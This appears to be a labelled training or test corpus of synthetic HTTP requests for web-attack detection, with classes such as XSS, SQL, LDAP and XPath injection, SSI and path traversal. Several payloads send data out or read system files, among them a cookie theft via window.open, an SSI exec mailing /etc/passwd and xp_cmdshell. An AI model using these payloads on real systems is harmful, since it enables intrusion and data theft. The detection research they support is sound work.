~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41681
Start - Id: 47825
class: XSS
GET /lEaek7sittsdds/tli5sccmw/6Wesy@sHUVcTgL/1iaakyztep.js?-geLeG=418580&roeesen1Uc=ewvzNVWP7tQ&dpucuaeza=%3C%21%5BCDATA%5B%3C%21--%5D%5D+%3E%3Cscript+%3E%5Balert++%28%27rdgssl%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&DJC-=e+8gloga%29Rmailn%40uW&l09HmdwedLeOqhG=447&rvnDtlewmne=fiTbenieval0s%40fevaledeEh&pZGGid4Fq=fwnonythN&lRrglgNs=grdmsk3yhPtsubi&rjz=961521&niGgdi=i%40D._mBK..E&aaheotW9Lim=3envbscriptse%5C+&aae4eo=iuyfumTlTewindow.open0d&BCh2=p&dn=eucwhacnandelete1tn&sxtilcuMgf=N86nS HTTP/1.0
Host: www.uutan.org
Connection: keep-alive
Accept: image/gif;q=0.1, image/jpeg, audio/*;q=0.7
Accept-Charset: iso-8859-3;q=0.8
Accept-Encoding: 
Accept-Language: 8u8u5seg-oohihE6q;q=0.6, rrp-ztgah39r
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="3"
Date: Mon, 12 May 08 15:34:24 CET
ETag: W/"OurwtpibD7A0noXC"
Expect: nets3L
From: esal@nqcagsropr.fr
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Thu, 10 Jul 08 01:12:20 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 0
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM ZHJuYncyazBha2toZHRlbjljM09FY3BvRWN1b3N0a2g=
Range: 2820-37,-5180,81-
Referer: /nqoapSri/0llrT/nzwcu0o.php4
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: trityb/0.4.3
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: n7a61b/2.6 36.163.107.205, FTP/7.8 145.225.174.171
Transfer-Encoding: gzip
Upgrade: tt5hfe/7.3
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47825
Start - Id: 37172
class: LdapInjection
GET /amdcnIT/rx6OTDQt5BU20.trCL/sevpne1ke/stnqADvehKts.sh?gnvsht=r3ym+%2F0insofet&9delI7h3ii4gfrr=%29++++%28+%7C++%28e1%3Dwn*%29 HTTP/1.0
Host: www.rvjea0e.com
Connection: etdoYs
Accept: video/*;q=0.4, image/png
Accept-Charset: x-mac-icelandic;q=0.9, euc-tw;q=0.1, gb2312;q=0.9
Accept-Encoding: gzip
Accept-Language: *;q=0.5
Cache-Control: enzAs='ieaad'
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Sun, 26 Apr 09 06:03:23 CET
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: pooroeeh=nA3Te;syttsT
From: aedk@htQLhAndaa.gov
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Sat, 29 Oct 05 13:09:30 CET
If-Match: "gNHabTFCB4ceHSJ1f9c1"
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: http://b9efe.be/nayG/nbsae/jeeeaNck.asmx
TE: deflate,trailers
Trailer: Via
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 7.8; ln-ng; rv:2.9.4) Gecko/24922513
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: gzip
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37172
Start - Id: 40733
class: SSI
GET /fa3doUsmmeo8tlav/e80FwNa6dEpZRG/pjtwnilmyfDiI96eat/iFX@spQy6tpozre.2/icoae9nEtpardassaiel/gZzDuuGOMjI/hQrqygR-d/R.y2WBPD9UnCYik/biseeaEda2msY2obbe/style0a_FFstyle./9gdesanppifMqc.cfm?Spweusz=631913&gRnu=4180&oanXcioi=+tef&8reo431fm0nv=hehnm2nullnbetc+r&4SHS=2coetedeth1tgb&uMrsihngPadg=%3Cek&HdiabdhPyexum=5680025680&eahazxatl=yuAOun&dHbinIZnbgsound=387&2a=siFfj0tunD&Ed=of1uonNluoetki&steniqnorr9=cb+nexec%5CvoRonieepnt5ah&eE=965183&nhOm=ppee&t6in8oup=+homeit HTTP/1.0
Host: 213.135.198.120
Connection: close
Accept: text/*;q=0.5, audio/x-wav, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: <!--  #odbc   connect="ajesoq,6aad,pbo96"         statement="select     *    from epNZr"-->
Cache-Control: elzl=nL1A0ca
Date: Sat, 03 Nov 07 23:08:23 CET
If-Range: Tue, 03 Feb 09 06:06:21 GMT
Referer: /filiEse.zip
User-Agent: rirlwrNaoo (ikKWzrV; tk-vpp; iSJBH.LDPT; bm7crU.; mJrNGK)
Via: 9.7 www.enehdUph.gif:12309, HTTP/1.9 www.RrdhwbwO.jpg
Transfer-Encoding: compress
----: ----------------------------------

null

End - Id: 40733
Start - Id: 42276
class: SqlInjection
GET /afNe7O2n/rTk6rtz8/see6epghsLti6edSsrt/1Emensduz/Q8..htm?NLthsqziu=opXF6AI-&emshjripcd=odbuhT7hnrt%3Aa&pcurdinnge=45859&ce0mtknkdemob=%3B+insert++++into+OPENROWSET%28+%27SQLoledb%27%2C%27uid%3DLchrel4%3Bpwd%3D28%3BNetwork%3DDBMSSOCN%3BAddress%3D1.41.142.193%2C1433%3B%27%2C%27select++++*++++from+_sysdatabases%27%29%3B++++select+++*+++++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&6vaj8ouet=350283 HTTP/1.1
Host: www.Ootyebeeu.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-hebrew, euc-jp;q=0.7, windows-1254;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="520"
Date: Thu, 17 Dec 09 06:42:10 UTC
ETag: "rhy9oCBT7nmj@i1"
Expect: nm9eac=yolte9
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 28 Mar 04 16:15:54 UTC
If-Match: "TCjUqLG2W-yNXEXIO0B"
If-None-Match: *
If-Range: Fri, 04 May 07 23:40:22 UTC
Max-Forwards: 9
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 17-374188
Referer: http://www.hrznrm.fr/eaecc3i.swf
TE: gzip;q=0.1,trailers,chunked;q=0.0
Trailer: Date
User-Agent: sDQeat6l
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0775x379
Via: 2.8 www.emyonca.tiff, HTTP/9.0 254.232.63.50, HTTP/2.0 51.215.62.167
Transfer-Encoding: 3flnn; hs5rnegd=i5sia
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 204.220.169.227
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42276
Start - Id: 46785
class: XSS
POST /eTftpZ@VA9Nynullg/XFfGzkgGexecWJNRI/elCuAToHeWXNbO.sh? HTTP/1.0
Content-Length: 238
Content-Language: jlh,m,iy
Content-Encoding: deflate
Content-Location: http://hres3iAI.org/miIosoe/rnee/ecee/ihte/ea2nrf.swf
Content-MD5: em0xdHBuZGNoeXJoZWVldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 May 05 24:01:53 CET
Last-Modified: Fri, 22 Jun 07 07:22:57 GMT
Host: 1.20.124.165:80
Connection: eanmtt
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad;q=0.1, koi8;q=0.1, gb2312, isiri-3342, x-mac-japanese
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 251.85.125.254
Cookie: llincen=likeoa5z;tTedonPco=hinlhiqb4eeydg;eac=xttLteti;28selu9AttcLjt=142767511
Cookie2: $Version="999"
Date: Thu, 15 Jun 06 07:37:19 GMT
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Sun, 03 Dec 06 17:17:08 GMT
If-Unmodified-Since: Sat, 01 Apr 06 01:25:31 CET
If-Match: *
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: Fri, 06 Jul 07 24:01:06 CET
Max-Forwards: 299
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 833-
Referer: /eeoaea7.pdf
TE: trailers
Trailer: Trailer
User-Agent: o488Ll6RE http://www.eao2a3eu.it
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hLqyribp=T1q'?2Ho?&fnoseohksrbuv=nNCthoEo6phO&clIscaoeAi=4255953845&ra=p&z9ld=<style type=" text/javascript " >[alert  ('zoho0It');]</style   >&ueete=609047741&_6evalz3H8Lidrgexec=3454620&euhNstrt=aOi

End - Id: 46785
Start - Id: 41135
class: SqlInjection
GET /eIcPxUGSEBTAR/obQR4t5oq7CdyUDjpYd/f6q4FEVb/8bcAfOd5/mP_JxP/zrcr/dgP0rMG851Guniony/iO/iP0a/GsJ9brw.msf?hdsdahgshaee6=2292763604&ieJuiemRhargeU=yy%2Felf&tn=A&Pfts2C=46757164&ersssmaoreowO5s=etdave2Esba&dtieo6vwrFask6=%27%3BEXEC++master.dbo.xp_cmdshell+++%27cmd.exe&elo=s&tpEcilq5f=1&dR4ozNn9=7046 HTTP/1.0
Host: 189.66.110.27
Connection: gihlavd
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.8, windows-1255, euc-tw;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 116.155.125.230
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="318"
Date: Wed, 19 Nov 08 18:58:36 GMT
ETag: W/"VyKWI0nTnYyfdWi-YLN"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Mon, 23 Oct 06 13:08:54 CET
If-Unmodified-Since: Fri, 20 Jun 08 11:21:43 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "KuNHUMzqJiC.OFi6Wx"
If-Range: Sun, 02 Nov 08 07:54:09 UTC
Max-Forwards: 773
MIME-Version: 9.5
Pragma: tb1etra='teGtMR'
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: Digest username="fhr3"
Range: 47372-1187,76948-,4440-295
Referer: /gysoan/OeCCrudn/3iomC/8loN.htm
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: ninx0c/3.1.2.8.7
UA-CPU: Sparc
UA-Disp: 080,7533,8
UA-Color: color16
Via: FTP/6.2 www.6itt.shtml:0600
Transfer-Encoding: deflate
Upgrade: is65/4.0, tshy/4.7
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41135
Start - Id: 39648
class: SSI
GET /V5C/txetGxt2Ltk8Q/qrMO8kU/dfDsKSUKf2ijHiR09UK/nJdX/ijn/liSlhaeghWhan3ekat.png?O@eIil5L=uhdeae&rsauo=62652&nehueoerhyjhDbh=r&otryTentslIyeey=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E HTTP/1.0
Host: www.abdu.biz:83079
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.6, identity;q=0.1, identity
Accept-Language: ti-ootmhgh;q=0.0, iu-Etarssge
Cache-Control: jrr=3rLoh
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="185"
Date: Thu, 09 Aug 07 06:25:35 CET
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: npzilkre@eesaoE.uk
If-Modified-Since: Wed, 18 Oct 06 15:51:51 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 863
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://fdro0t.uk/MoceL.shtml
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: geaCoapos/9.2.5
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: HTTP/1.4 www.roev6g5.tiff:422, 6.0 25.68.186.172, FTP/3.2 33.252.128.169
Transfer-Encoding: aetp
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39648
Start - Id: 40665
class: SSI
GET /Vb/@lB_0JWhttpmKKdDS/thvnhlj6fandia0e/do@o/hxI4fB3aeLQ7wRl/yB3VTotDdi/x5oa/wYWCrANYyQlrvcabz.mdb?ala=hn&FhttpLSQ_P=dySLurNae&xmletcjwMj7@w=ne&unp=9973&eac=%2B&nA9Ni6hnihn=6%3DlocationTecnEet&qUIrUTBH-=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E HTTP/1.0
Host: 130.103.185.103
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 248.142.217.61
Cookie: nocmsIas2rn=912324
Cookie2: $Version="0"
Date: Sun, 30 Oct 05 17:29:39 CET
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Wed, 22 Jul 09 04:08:44 UTC
If-Unmodified-Since: Tue, 06 Nov 07 04:34:22 GMT
If-Match: "bwXNNE3klgJS@QC0K.tR"
If-None-Match: *
If-Range: "H-dg@Ho__vGPbspYGb"
Max-Forwards: 9513
MIME-Version: 9.9
Pragma: sl=nG
Authorization: Basic dzhuOXRvOnRsZTFsOWw=
Referer: http://ethtOic.com/lnmdL0/huhersbh/eeesuhl.mspx
TE: trailers,deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 8.5; nH-ke; rv:1.6.3) Gecko/39116895
UA-CPU: MIPS
UA-Disp: 7385,808,16
UA-Color: color32
Via: trrEt/9.2 www.adancn.jpg
Transfer-Encoding: olnood
Upgrade: pcv/3.4, ah5lez/2.2, ANae/5.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40665
Start - Id: 47201
class: XSS
GET /vD__RiZBt8/uektqJrEoapasnroekpi/aChrren1un96yratte/hW/r8et/vQMUXnM22/hACz9FfzL8Vfb@BCvtz/4ppassthruB0wQASsYG-/6bl/Zg/gGIp45VsX/oHQzmMW4cCZtCr.tiff?AeR6u6=ooVea&f1rrnh2rsctmIr=an&hsiooifttcIet4e=tE-ri+lo8rhBt%3Blln&ov1plshOoq=3&odne=p1Cdc3_g%40&ant=m%40h8t%5D&@cWm6w0N-S=%3Cstyle++%3E%3C%21--%3C%2Fstyle%3E%3Cscript+%3E%5Balert++++%28%27r2he%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&ofnesoqoen4r=9ud6&mZrt6on=%3CgttWssoconnect&t9e6lbdat=adpq&attaeIdcirse=0138554732&beftKes0snhtwc1=04541567 HTTP/1.0
Host: www.etUit.uk:44
Connection: o9enE
Accept: text/xml, image/jpeg;q=0.6
Accept-Charset: shift_jis;q=0.5, cp-936;q=0.9, x-mac-ce
Accept-Encoding: gzip;q=0.9, identity;q=0.4, identity
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 63.161.16.102
Cookie: kThJwtspreks2f=834;56P4N1II=GsodjNlY;Mq6oe=5;ek=e.eJv;S1AUm_shutdownCPH56=6691
Cookie2: $Version="35"
Date: Wed, 26 May 04 08:04:53 CET
ETag: W/"sgzTyQPOVZPttH244HNT"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Tue, 20 Jan 04 23:51:42 GMT
If-Unmodified-Since: Sat, 26 Jun 04 10:15:04 GMT
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest algorithm=MD5-sess
Range: 676-108618,2650-4238
Referer: /wywooaNn.php3
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: jhwrlcnmpRcp
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47201
Start - Id: 40103
class: SSI
GET /vjT97N6@MPmWJ_lMfW/tsIdotiou.asp?p6=%3C%21--++%23exec++cmd%3D%22%2Fbin%2Fmail+++1myp.com++++%3C+%2Fetc%2Fpasswd%22--%3E&5W=9oCbk&cyo4uee=%5B%7Ee9eahh66w+%24d&AmVnteirreqdi=mJ5oWU HTTP/1.0
Host: 249.7.22.192:80
Connection: hdse
Accept: */*
Accept-Charset: iso-8859-7, windows-874;q=0.7, ks_c_5601-1987;q=0.8, windows-1258, windows-1255
Accept-Encoding: identity;q=0.5, identity, deflate;q=0.6
Accept-Language: axnua-v;q=0.9, tebe-o;q=0.3, r-hB5;q=0.4, aiai-rfnyo
Cache-Control: no-cache
Client-ip: 113.207.135.168
Cookie: idwOvyoxhT=n
Cookie2: $Version="674"
Date: Mon, 19 Nov 07 12:21:51 GMT
ETag: "IvcPvGZbqIP.B5j6"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 06 Aug 07 24:54:10 GMT
If-Unmodified-Since: Sat, 23 Dec 06 21:03:22 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 72
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: tuezy3 Advnosr=womCg0g
Authorization: NTLM b2V0Y3lscmRhcGJjZXI1dW90aXVydWloYXM5ZHBmY2dlYXplZHdsZQ==
Range: 12545-4
Referer: /mshi/artr4h0p/qrosMfg/ngoezsw9.jpeg
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.7 (compatible; MSIE 9.2; Linux i386; behs4eo1o)
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 192x9251
Via: 4hd/2.2 132.219.177.127, HTTP/0.8 244.55.91.37:8957, antm/7.4 www.efehyj.tiff
Transfer-Encoding: gckyMc
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 875 www.mevs.jpg "9uMt5m0detdesdfons" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40103
Start - Id: 35886
class: XPathInjection
GET /BVMlL_includeMtrkhavingD/edjdE5QweAWs/HformS@ZconnectWSM/leeSOed/8kgDH1L2mCgKfcUxtfU/af@fDBS4Ep9zl0A/emwhtC0nu.msf?ede=iTar%27++or+++1%3C+++as%2Fre%2Fmawe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D728%5D+++++or+++++%27eV%27+++%3D%27&0aefromtUecho=binmsea9qr HTTP/1.1
Host: www.eweme.it
Connection: close
Accept: audio/x-wav
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Cookie: mre=5;cont6eloln0XLn=tht
Cookie2: $Version="56"
If-Modified-Since: Fri, 25 Jul 08 14:11:14 GMT
If-Range: "fpz47uRVd5n1F2N"
Range: 611-037
Referer: http://tdBn.be/Trrfn4e6/iatsGwG/sia9k/niieakt/emBsl.mspx
TE: gzip;q=0.5,trailers,chunked;q=0.9
User-Agent: 2ylsnehi/1.3.4.6

null

End - Id: 35886
Start - Id: 47177
class: XSS
GET /eQ2o.5iesyjNDZpc8Zuj/o9lImfngTPMYKxgs7_J/bA3utnhreSNWobfdNur9/a.QYsVc_3W/dvezO8VG56ObM/xl/K931c1.htm?zwE_8MqRE4=ptga&dIshiw=15150331&Pwbm=57&xImetc-updateHYk7usr5=zmaiodE&hoestsha=2ztae5TprCEc8r&Ed0tl=tGu__H&6o=iam7JDHnetcfe%3A+IiframeHm&lmate2Deqeehae=983&Hwws4N6hra3oye=%3Cbgsound+++++src++%3D+%22++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F165.112.244.84%2Finar.php4%27%2Bdocument.cookie%29%3B%5D++++++++%22+%3E&tihD1eE=zphmnts&nApaEd=5lerjooEnnitn&9iAa6Tosos=toee&edkeenovminta=fseriuadhehsrcuh HTTP/1.0
Host: www.mdoeDas.cz:80
Connection: lftedil
Accept: */*
Accept-Charset: euc-cn, koi8, windows-874
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 102.236.20.245
Cookie: 4ta7oC=0
Cookie2: $Version="265"
Date: Sun, 22 Jul 07 09:38:54 GMT
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Mon, 05 Jun 06 14:53:18 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: *
If-None-Match: "4Cg3kkeQXLS@LRX-ixQZ"
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 691
MIME-Version: 8.3
Pragma: cTbeto=ehr
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM ZmxlaU5BM2V0cnJ1YW1vY210aWV0cnRRb3J6c250bm95dFZhVGhjaHU=
Range: 80-60466,-60,-277
Referer: http://r0ucv.it/leui/taSo7cin.png
TE: chunked,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (compatible; MSIE 9.2; Win98; pftysoi8a; ksgxc6tL)
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: 5.7 209.82.162.164:73669, 0.7 191.195.187.121
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47177
Start - Id: 49128
class: XPathInjection
GET /tpeeaeR/ens/5db/nt/cene9bitTfnuun/tbsPGs8_5qSXO-@GX.msf?ashnrni7e9yIas=10318++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++910%3D&tT=z1RWRkY9dJn&osf50lh48kti=At2&J4qUshutdownti=i2lnxop2ei+%7Esock_stream&atd2tmc=e&dphElatV0tqnS6L=30145640&GnlQhvoe8jyni9=hr%40eetq&bkoDu=tl&eOrprTUsooatLur=hec&shutdown.2FZWdlR=82008530&e8dms=h+ieie8 HTTP/1.1
Host: 172.192.215.14:9416
Connection: 3l8e
Accept: */*;q=0.1
Accept-Charset: windows-1258, x-mac-roman;q=0.4
Accept-Encoding: *
Accept-Language: mtah-aE8mn
Cache-Control: only-if-cached
Client-ip: 64.55.189.239
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="35"
Date: Thu, 15 Feb 07 03:02:47 UTC
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: eqva=geaerd;skie9
From: NktwIe@earsOsuo.org
If-Modified-Since: Thu, 13 Mar 08 12:24:22 GMT
If-Unmodified-Since: Sun, 14 Dec 08 15:29:17 CET
If-Match: *
If-None-Match: "3LkXk@fqvVjnJeA_V"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: NTLM ZjJyZUVzZWlvMm5uOGRlbjFzcmNxWWN0dHB0cm5zb3Vyc0VoY2huZWE=
Range: 137110-8612,-4,90364-3
Referer: http://eEu1i0.com/oegliea/ijhic8/iseleirM/Rioeii.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 3.3; ph-it; rv:8.9.3) Gecko/70417607
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: 3.4 www.elsa.css, 4.4 234.160.25.167, atE/9.0 32.82.42.157
Transfer-Encoding: deflate
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49128
Start - Id: 36359
class: PathTransversal
GET /t@8sdEUlN/iE5wV/shxz6xT.2QMB/ns/n0GY0XoH3N8/iC_QtuX9BtEXk0gN/NxJDw33ChnJHecho9s.php?ieimean=ihne&tjr0uagcr=%2Fetc%2Fpasswd&l4mOuH3ab=19506925&5urr=ra&ryR-=nph-rk HTTP/1.0
Host: www.aeunsmt.uk:33365
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.5, hz-gb-2312;q=0.7, cp-932, us-ascii;q=0.2, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 150.79.127.140
Cookie: 6tfjaC=t8lcsn1xeesutns
